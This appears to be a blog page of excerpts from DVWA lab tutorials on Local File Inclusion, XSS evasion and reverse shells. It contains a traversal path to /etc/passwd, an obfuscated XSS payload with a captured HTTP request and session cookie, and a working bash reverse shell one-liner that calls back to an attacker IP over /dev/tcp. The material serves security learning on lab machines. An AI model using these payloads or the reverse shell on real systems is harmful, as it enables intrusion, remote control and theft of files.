DVWA Damn Vulnerable Web App Windows Local File Inclusion (LFI) Attack

Local File Inclusion Attack Using DVWA and Windows: notice that the directory structure and the attack differ from Linux/Unix machines. For Windows targets you need to include the drive prefix C:\ in the Local File Inclusion path, whereas on *nix you can usually just traverse backwards, e.g. ../../../../etc/passwd. Converted PCAP: 2015-05-02 19:49:09.235706 IP 192.168.1.100.44344 > 192.168.1.101.80: Flags…

Cross Site Scripting Evasion XSS OWASP PCAP Network Traffic Output

Easy evasion – <script>alert(String.fromCharCode(88,83,83))</script>

2015-05-01 20:23:45.908832 IP 192.168.1.100.43980 > 192.168.1.101.80: Flags [P.], seq 3207:3725, ack 24881, win 633, options [nop,nop,TS val 1687284507 ecr 115747653], length 518
E..:..@.@……d…e…P#.h..D…..y.F….. d…..+EGET /dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.101/dvwa/vulnerabilities/xss_r/
Cookie: security=low; PHPSESSID=n473gcv8qrbmog7t21mldhn664
Connection: keep-alive…

Simple ways to create PHP, Python, PERL, xterm, bash, exec, java and Netcat Reverse Shells

Spawning a bash reverse shell – tested on Ubuntu:
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
You can also open a socket like this on most Linux machines:
exec 3<>/dev/tcp/localhost/4444
If you want to read from and write to the socket you can use echo or cat, for example:
cat <&3
SSH-2.1-OpenSSH_6.2
This is called a pseudo-path interpreted by bash,…